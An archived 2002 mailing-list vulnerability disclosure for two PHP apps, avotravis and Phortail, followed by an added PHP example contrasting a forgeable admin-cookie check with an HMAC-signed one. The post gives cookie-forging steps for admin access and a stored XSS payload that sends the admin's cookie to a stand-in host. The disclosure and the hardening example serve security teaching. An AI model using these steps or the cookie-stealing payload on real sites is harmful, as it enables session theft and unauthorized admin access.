Vulnerability Development
mailing list archives
Security holes in two PHP services.
From: frog frog <leseulfrog () hotmail com>
Date: 1 Mar 2002 16:37:08 -0000
The first one is the poll "avotravis", versions 2.1 and less.
1) Distortion of the limitations of multiple votes:
Set the cookie with the name "already_voted" and
value "1" to the url /avotravis.php3?vote=1 for "yes"
and /avotravis.php3?vote=1 for "no".
2) Access to the administration part:
Set the cookie "adminsondage", "true" to the
webpage http://www.host.com/admin.php3
More details in French:
http://www.ifrance.com/kitetoua/tuto/avotravis.txt
The second is the portal "Phortail" versions 1.2.1 and
less.
The admin password is sent unencrypted by cookie and
there is no limitation in the posting of the news for the
scripts.
It is enough to send this kind of script :
<im*g src="javascri*pt:phortail()">
<s*cript>function phortail() {
a="http://haxor.com/file?"+document.cookie;
window.open(a); } </s*cript>
(without '*') as a news item and wait for the admin...
More details in French:
http://www.ifrance.com/kitetoua/tuto/phortail.txt
Creators are alerted.
Sorry for my bad English.
frog-m () n
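
Added example, not part of the original post and not code from avotravis or Phortail: a sketch of why a cookie flag such as "adminsondage" cannot serve as authorization, next to a check the client cannot forge. Only the cookie name comes from the post; the function names, the "expiry.mac" cookie format and the 900-second lifetime are assumptions made for this illustration.

```php
<?php
// Constructed illustration. Only the cookie name "adminsondage" is from the post.

// Pattern the post describes: the cookie's value alone grants admin access.
function is_admin_weak(array $cookies): bool
{
    return ($cookies['adminsondage'] ?? '') === 'true';
}

// Hardened variant: the cookie holds "expiry.mac", where the MAC is keyed
// with a secret that never leaves the server.
function issue_admin_cookie(string $key, int $now, int $ttl = 900): string
{
    $expiry = (string) ($now + $ttl);
    return $expiry . '.' . hash_hmac('sha256', 'adminsondage|' . $expiry, $key);
}

function is_admin_signed(array $cookies, string $key, int $now): bool
{
    $value = $cookies['adminsondage'] ?? '';
    // Reject arrays (adminsondage[]=...) and anything not shaped "expiry.mac".
    if (!is_string($value) || substr_count($value, '.') !== 1) {
        return false;
    }
    [$expiry, $mac] = explode('.', $value);
    if (!ctype_digit($expiry) || (int) $expiry < $now) {
        return false; // malformed or expired
    }
    $expected = hash_hmac('sha256', 'adminsondage|' . $expiry, $key);
    return hash_equals($expected, $mac); // constant-time comparison
}

// Constructed sample input: one client-chosen cookie, one server-issued cookie.
$key    = random_bytes(32);
$now    = time();
$forged = ['adminsondage' => 'true'];
$issued = ['adminsondage' => issue_admin_cookie($key, $now)];

var_dump(is_admin_weak($forged));                       // client-chosen value, weak check
var_dump(is_admin_signed($forged, $key, $now));         // client-chosen value, signed check
var_dump(is_admin_signed($issued, $key, $now));         // server-issued value, still valid
var_dump(is_admin_signed($issued, $key, $now + 3600));  // server-issued value, past expiry
```

The same reasoning applies to "already_voted": a vote limit enforced only by a cookie the client controls is advisory, so the record of who has voted has to live on the server.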